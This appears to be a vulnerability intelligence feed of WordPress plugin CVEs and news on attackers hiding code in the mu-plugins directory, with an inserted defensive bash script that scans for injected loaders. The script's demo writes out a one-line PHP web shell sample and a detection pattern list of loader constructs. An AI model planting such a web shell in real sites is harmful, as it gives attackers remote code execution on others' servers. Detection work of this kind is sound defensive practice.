Threat and Vulnerability Intelligence Database

CVE-2025-2055

Description: The MapPress Maps for WordPress plugin before 2.94.9 does not sanitise and escape some parameters when outputting them in the page, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks.

EPSS Score: 0.04%

Source: CVE
April 3rd, 2025 (16 days ago)

CVE-2025-2048

Description: The Lana Downloads Manager WordPress plugin before 1.10.0 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks and download arbitrary files on the server

EPSS Score: 0.03%

Source: CVE
April 1st, 2025 (18 days ago)

CVE-2025-1986

Description: The Gutentor WordPress plugin before 3.4.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks

EPSS Score: 0.03%

Source: CVE
April 1st, 2025 (18 days ago)

Description: WordPress plugin "Welcart e-Commerce" provided by Welcart Inc. contains an untrusted data deserialization vulnerability.

Source: Japan Vulnerability Notes (JVN)
April 1st, 2025 (18 days ago)

Description: Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. [...]

Source: BleepingComputer
March 31st, 2025 (19 days ago)

Description: Threat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the

Source: TheHackerNews
March 31st, 2025 (19 days ago)
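The two reports above describe the same technique: a PHP file dropped into wp-content/mu-plugins runs on every request without ever being activated, so it never shows up as an enabled plugin. The script below is an added triage example, not code from the page, from either outlet, or from WordPress. It assumes a standard wp-content layout, an operator-maintained baseline file listing the mu-plugin files that are supposed to exist, and a pattern list of constructs common in injected loaders; the sample tree it builds is constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example (not from the page or from WordPress): triage the mu-plugins
# directory, which WordPress auto-loads without activation. The paths, the
# pattern list and the sample files below are assumptions.

# Print every .php file under the given mu-plugins directory that matches
# patterns typical of injected loaders: runtime-decoded code, remote fetches,
# visitor redirects. A hit is a lead, not proof; read the file.
scan_mu_plugins() {
    local dir="$1"
    [ -d "$dir" ] || { echo "no mu-plugins directory at $dir" >&2; return 2; }
    local pattern='eval\(|base64_decode\(|gzinflate\(|str_rot13\(|file_get_contents\("https?://|wp_remote_get\(|header\("Location:'
    grep -rliE "$pattern" --include='*.php' "$dir" 2>/dev/null | sort
    return 0
}

# mu-plugins need no activation, so a file list diff against a baseline the
# operator maintains catches loaders that match none of the patterns above.
# Prints relative paths present on disk but absent from the baseline file.
unexpected_mu_plugins() {
    local dir="$1" baseline="$2"
    ( cd "$dir" && find . -type f | sed 's|^\./||' | sort ) | grep -vxFf "$baseline" || true
}

# Build a constructed sample tree: one legitimate mu-plugin, one injected
# loader, and a baseline that only knows about the legitimate file.
make_sample_tree() {
    local root
    root="$(mktemp -d)"
    mkdir -p "$root/wp-content/mu-plugins"
    cat > "$root/wp-content/mu-plugins/site-tweaks.php" <<'EOF'
<?php
// Constructed benign mu-plugin: hides the admin bar for everyone.
add_filter('show_admin_bar', '__return_false');
EOF
    cat > "$root/wp-content/mu-plugins/index.php" <<'EOF'
<?php
// Constructed injected loader: executes whatever the request carries.
eval(base64_decode($_REQUEST['x']));
EOF
    printf 'site-tweaks.php\n' > "$root/mu-baseline.txt"
    printf '%s' "$root"
}

# Stand-alone demo on the constructed tree. In production point the two
# checks at the real directory, e.g. /var/www/html/wp-content/mu-plugins
# (path is an assumption), and keep the baseline outside the web root.
demo_root="$(make_sample_tree)"
echo "pattern hits:"
scan_mu_plugins "$demo_root/wp-content/mu-plugins"
echo "files not in baseline:"
unexpected_mu_plugins "$demo_root/wp-content/mu-plugins" "$demo_root/mu-baseline.txt"
rm -rf "$demo_root"
```

Run both checks from cron or a configuration-management agent and alert on any output; the baseline diff is the more robust of the two, because an attacker can avoid every string pattern but cannot avoid adding a file to a directory that WordPress loads unconditionally.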

CVE-2025-0613

Description: The Photo Gallery by 10Web WordPress plugin before 1.8.34 does not sanitise and escape comments added on images by unauthenticated users, leading to an Unauthenticated Stored-XSS attack when comments are displayed

EPSS Score: 0.06%

Source: CVE
March 31st, 2025 (19 days ago)

CVE-2024-4061

Description: The Survey Maker WordPress plugin before 4.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

EPSS Score: 0.05%

SSVC Exploitation: none

Source: CVE
March 29th, 2025 (21 days ago)

CVE-2024-3822

Description: The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

EPSS Score: 0.64%

SSVC Exploitation: none

Source: CVE
March 29th, 2025 (21 days ago)

CVE-2024-3582

Description: The UnGallery WordPress plugin through 2.2.4 does not have CSRF checks in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack

EPSS Score: 0.03%

SSVC Exploitation: poc

Source: CVE
March 29th, 2025 (21 days ago)